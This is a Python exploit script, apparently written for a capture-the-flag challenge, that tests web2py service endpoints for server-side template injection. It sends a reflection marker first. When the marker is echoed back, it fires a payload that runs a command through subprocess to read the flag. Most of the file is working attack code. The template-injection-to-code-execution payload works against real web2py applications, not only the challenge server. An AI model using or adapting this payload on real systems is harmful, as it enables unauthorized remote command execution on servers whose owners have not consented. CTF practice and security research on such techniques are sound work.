#!/usr/bin/env python3
"""
Test web2py service endpoints for SSTI
"""

import requests
import urllib3
import re

urllib3.disable_warnings()

BASE_URL = "https://vulnerability-research-dbfd88d4dab49dc2.chals.uoftctf.org"

def test_service_endpoints():
    """Test /call/ service endpoints"""
    
    endpoints = [
        "/welcome/default/call/json",
        "/welcome/default/call/xml",
        "/welcome/default/call/jsonrpc",
        "/welcome/default/call/jsonrpc2",
        "/welcome/default/call",
    ]
    
    # SSTI payload
    ssti_payload = "{{=__import__('subprocess').check_output(['/readflag']).decode()}}"
    test_payload = "{{='SSTI_TEST_MARKER'}}"
    
    for endpoint in endpoints:
        print(f"\n{'='*60}")
        print(f"Testing: {endpoint}")
        print(f"{'='*60}")
        
        # Try GET with parameter
        try:
            response = requests.get(
                BASE_URL + endpoint,
                params={"test": test_payload},
                verify=False,
                timeout=10
            )
            
            print(f"GET Status: {response.status_code}")
            
            if "SSTI_TEST_MARKER" in response.text:
                print("[+] Marker found in response!")
                
                # Check if it's outside of URL/script tags
                if '<script' not in response.text[max(0, response.text.find("SSTI_TEST_MARKER")-200):response.text.find("SSTI_TEST_MARKER")+200]:
                    print("[!!!] Marker found outside script tags!")
                    
                    # Try RCE payload
                    print("\n[*] Trying RCE payload...")
                    rce_response = requests.get(
                        BASE_URL + endpoint,
                        params={"test": ssti_payload},
                        verify=False,
                        timeout=10
                    )
                    
                    if "uoftctf{" in rce_response.text:
                        print("\n[!!!] FLAG FOUND!")
                        flags = re.findall(r'uoftctf\{[^}]+\}', rce_response.text)
                        for flag in flags:
                            print(f"\nFLAG: {flag}\n")
                        return flag
                    
                    # Save response
                    with open(f"service_response.html", "w") as f:
                        f.write(rce_response.text)
                    print(f"Saved to service_response.html")
                
        except Exception as e:
            print(f"GET Error: {e}")
        
        # Try POST
        try:
            response = requests.post(
                BASE_URL + endpoint,
                data={"test": test_payload},
                verify=False,
                timeout=10
            )
            
            print(f"POST Status: {response.status_code}")
            
            if "SSTI_TEST_MARKER" in response.text:
                print("[+] Marker found in POST response!")
                
        except Exception as e:
            print(f"POST Error: {e}")

if __name__ == "__main__":
    flag = test_service_endpoints()
    
    if flag:
        print(f"\n{'='*60}")
        print(f"SUCCESS! FLAG: {flag}")
        print(f"{'='*60}")